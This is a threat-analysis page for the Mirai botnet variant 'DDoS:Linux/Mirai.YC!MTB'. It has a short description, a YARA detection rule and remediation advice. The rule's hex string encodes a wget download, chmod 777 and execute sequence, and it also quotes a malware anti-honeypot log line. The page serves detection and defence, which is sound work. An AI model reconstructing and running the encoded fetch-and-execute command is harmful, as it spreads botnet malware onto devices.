DDoS:Linux/Mirai.YC!MTB - Windows Defender Threat Analysis

This is a confirmed Mirai botnet variant targeting Linux systems. It uses anti-honeypot mechanisms to evade detection and downloads/executes malicious payloads, likely to enslave devices for Distributed Denial of Service (DDoS) attacks.

No specific strings found for this threat

rule DDoS_Linux_Mirai_YC_2147742140_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "DDoS:Linux/Mirai.YC!MTB"
        threat_id = "2147742140"
        type = "DDoS"
        platform = "Linux: Linux platform"
        family = "Mirai"
        severity = "Critical"
        info = "MTB: Microsoft Threat Behavior"
        signature_type = "SIGNATURE_TYPE_ELFHSTR_EXT"
        threshold = "2"
        strings_accuracy = "Low"
    strings:
        $x_1_1 = {77 67 65 74 20 68 74 74 70 [0-2] 3a 2f 2f [0-3] 2e [0-3] 2e [0-3] 2e [0-3] 2f [0-96] 3b 20 63 68 6d 6f 64 20 37 37 37 20 2a 3b 20 2e 2f}  //weight: 1, accuracy: Low
        $x_1_2 = "[antihoney] failed stage 1 honeypot detected!" ascii //weight: 1
    condition:
        (filesize < 20MB) and
        (all of ($x*))
}

Immediately isolate any infected Linux systems. Perform a thorough scan to detect and remove the Mirai malware, patch all system vulnerabilities, enforce strong access controls and unique, complex passwords, and implement robust network segmentation with egress filtering to block communication with Mirai Command and Control (C2) servers.